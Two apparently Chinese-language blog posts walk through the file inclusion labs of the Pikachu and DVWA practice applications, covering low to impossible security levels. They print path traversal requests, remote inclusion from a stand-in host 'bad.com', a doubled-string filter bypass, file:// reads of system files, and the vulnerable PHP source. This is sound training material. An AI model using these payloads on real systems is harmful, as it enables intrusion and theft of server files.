发表更新penetration Test / train3 分钟读完 (大约377个字)

something about Pikachu - File Inclusion

pikachu

pikachu => 备份地址

File Inclusion

概述

各种开发语言都提供了内置的文件包含函数,使得开发人员可以在一个代码文件中包含(引入)另外一个代码文件。 PHP中提供了include()include_once()require()require_once()等函数。

当要包含的目标文件名被定义为变量,并期待前端用户传递此变量,若没有做够安全考虑,会引发文件包含漏洞

文件包含漏洞分为:

  • 本地文件包含漏洞

    仅能对服务器本地文件进行包含,由于包含文件并不受攻击者控制,因此更大可能是包含一些系统配置文件,进而读取系统敏感 信息。
    本地文件包含漏洞文件上传漏洞结合时,变相实现了包含任意文件的功能,危害更大。

  • 远程文件包含漏洞

    能够通过URL包含远程文件,因此可以包含任意文件,危害很大。

File Inclusion(local)

构造请求,包含指定文件。关于服务器文件路径,可以尝试利用命令执行漏洞来获取。

1
/pikachu/vul/fileinclude/fi_local.php?filename=../../../../bitnami.css&submit=Submit+Query

File Inclusion(remote)

构造请求,包含远程文件。

1
/pikachu/vul/fileinclude/fi_remote.php?filename=http://bad.com/bad.php&submit=Submit+Query
 
发表更新penetration Test / train4 分钟读完 (大约578个字)

something about DVWA - File Inclusion

DVWA

DVWA => 备份地址

File Inclusion(文件包含)

文件包含

php配置允许allow_url_include时允许文件包含,配置允许allow_url_fopen时允许包含远程文件。

Low

  • 手工测试

    • 本地文件包含

      dvwa文件包含为此URL:http://train.com/dvwa/vulnerabilities/fi/?page=include.php,尝试替换include.php包含 本地敏感文件。

      http://train.com/dvwa/vulnerabilities/fi/?page=C:\xampp\htdocs\DVWA\robots.txt

      http://train.com/dvwa/vulnerabilities/fi/?page=..\..\robots.txt

    • 远程文件包含

      将远程恶意文件url传递给dvwa。

      http://train.com/dvwa/vulnerabilities/fi/?page=http://bad.com/bad.php

  • 源码分析

    直接在request中获取文件名,直接进行包含。

    1
    2
    // The page we wish to display
    $file = $_GET[ 'page' ];

Medium

  • 手工测试

    str_replace只会过滤一次,因此可以使用 重复构造 的方法( 双写 )进行绕过。

    想要构造http://,因此构造httphttp://://,这样http://被过滤掉后,剩余的字符组合成 目标字符串
    同样的,想要构造../,因此构造..././

    构造后的漏洞利用url为:

    http://train.com/dvwa/vulnerabilities/fi/?page=httphttp://://bad.com/bad.php

    http://train.com/dvwa/vulnerabilities/fi/?page=..././..././robots.txt

  • 源码分析

    request中获取文件名后,使用str_replace将其中的敏感字串过滤掉。

    1
    2
    3
    4
    5
    6
    // The page we wish to display
    $file = $_GET[ 'page' ];

    // Input validation
    $file = str_replace( array( "http://", "https://" ), "", $file );
    "file = str_replace( array( "../", "..\\" ), "", $file );

High

  • 手工测试

    由于强制要求文件名以file开头,可以使用File协议绕过判断。File协议本地文件传输协议, 因此需要配合文件上传漏洞使用,将恶意文件上传至目标服务器,再使用File协议指定目标文件。

    File协议使用:

    1
    file://path/to/file

    使用File协议后指定包含文件:

    1
    http://train.com/dvwa/vulnerabilities/fi/?page=file://C:\Windows\System32\drivers\etc\hosts

  • 源码分析

    request中获取文件名后,判断其是否为固定字符开头(以file开头)。

    1
    2
    3
    4
    // Input validation
    if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
        //...
    }

Impossible

  • 源码分析

    request中获取文件名后,判断其是否在允许包含的文件列表中。

    1
    2
    3
    4
    // Only allow include.php or file{1..3}.php
    if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
        //...
    }
 

归档

×